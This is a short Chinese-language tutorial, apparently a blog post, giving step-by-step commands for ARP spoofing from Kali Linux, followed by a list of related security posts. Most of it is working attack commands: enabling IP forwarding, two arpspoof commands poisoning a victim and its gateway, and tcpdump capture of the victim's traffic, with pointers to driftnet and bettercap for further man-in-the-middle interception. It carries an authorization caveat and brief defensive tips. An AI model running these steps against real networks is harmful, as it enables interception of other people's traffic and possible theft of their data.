kali arp欺骗

ARP欺骗(ARP Spoofing)的核心是伪造网关与目标设备的MAC地址映射,让流量经过你的Kali主机。请务必仅在自有网络或获得书面授权的环境中测试。

以下是使用 arpspoof(最简单)的标准步骤:

  1. 开启IP转发(让目标能正常上网,避免断网)

```bash

echo 1 > /proc/sys/net/ipv4/ip_forward

```

  1. 执行欺骗(需要两个终端窗口)

· 窗口1 - 欺骗目标(告诉目标:我是网关)

```bash

sudo arpspoof -i 网卡名 -t 目标IP 网关IP

```

· 窗口2 - 欺骗网关(告诉网关:我是目标)

```bash

sudo arpspoof -i 网卡名 -t 网关IP 目标IP

```

常用参数替换:-i eth0(你的网卡),-t 192.168.1.100(受害者),192.168.1.1(网关)。

  1. 验证与抓包

· 查看流量:sudo tcpdump -i eth0 host 目标IP

· 用 driftnet 抓图片,或 bettercap 进行更高级的中间人攻击。

停止欺骗:Ctrl+C 结束两个窗口,系统约30秒后自动恢复ARP表。或执行 ip link set arp off/on 快速重置。

现代防御:HTTPS加密网站(如银行、支付宝)只能抓到乱码,无法获取密码。开启ARP防火墙或使用静态ARP表可防御。

相关推荐
liann1193 小时前
3.2_红队攻击框架--MITRE ATT&CK‌
python·网络协议·安全·网络安全·系统安全·信息与通信
电子科技圈6 小时前
芯科科技在蓝牙亚洲大会展示汽车与边缘AI前沿蓝牙创新技术, 解锁车用、家居、健康及工商业等应用场景
人工智能·科技·嵌入式硬件·mcu·物联网·网络安全·汽车
大方子8 小时前
【好靶场】有点儿用的图形验证码
网络安全·好靶场
能年玲奈喝榴莲牛奶8 小时前
记一次挖矿病毒应急
网络安全·应急响应
网络安全许木9 小时前
自学渗透测试第30天(第一阶段总结与Metasploitable3部署)
网络安全·渗透测试
王大傻092811 小时前
注入攻击的概念
web安全·网络安全
txg66611 小时前
MDVul:用语义路径重塑漏洞检测的图模型能力
人工智能·安全·网络安全
南行*12 小时前
CodeQL 初探
安全·网络安全·系统安全
菩提小狗14 小时前
每日安全情报报告 · 2026-04-30
网络安全·漏洞·cve·安全情报·每日安全
南行*15 小时前
Intel Pin 插桩
安全·网络安全